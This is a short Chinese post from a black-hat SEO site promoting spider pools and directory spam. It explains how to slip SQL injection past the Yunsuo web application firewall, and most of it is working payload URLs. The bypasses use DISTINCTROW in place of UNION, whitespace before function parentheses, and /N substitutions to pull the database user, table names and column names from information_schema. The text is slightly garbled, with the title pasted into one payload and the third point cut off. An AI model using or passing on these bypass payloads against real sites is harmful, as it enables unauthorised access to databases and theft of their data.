黑帽SEO
免费发布泛目录 蜘蛛池 黑帽SEO工具

过云锁注入技巧

  win03 + apache + php + 云锁最新版win_3.1.6

  第一种方法就不多说了,网上很早就出来了,检测post后忽略get,从而被绕过。

  这里主要介绍下如何绕过正则。

  先贴payload:

  https://www.0dayhack.com/test.php?id=2%27DISTINCTROW select 1,2,3– –

  https://www.0dayhack.com/test.php?id=2%27DISTINCTROW select 1,user (),3– –

  https://www.0dayhack.com/test.php?id=2%27DISTINCTROW select/N,table_name,/Nfrom information_schema.tables where table_schema=’blog’ limit 1 offset 1– –

  https://www.0dayhack.com/test.php?id=2%27DISTINCTROW 过云锁注入技巧 select/N,column_name,/Nfrom information_schema.columns where table_name=’users’ limit 1 offset 1– –

  1. 多重内联()+额外关键字(DISTINCTROW)

  union select=> DISTINCTROW select

  2. 函数和括号间增加空白符

  user()=> user ()

  3.

  select 1,table_name,3=> select/N,table_name,/Nfrom

未经允许不得转载:黑帽SEO-实战SEO技术培训、泛目录站群、蜘蛛池、流量技术教程 » 过云锁注入技巧
分享到: 更多 (0)

黑帽SEO-实战SEO技术培训、泛目录站群、蜘蛛池、流量技术教程

不做韭菜坚决不做韭菜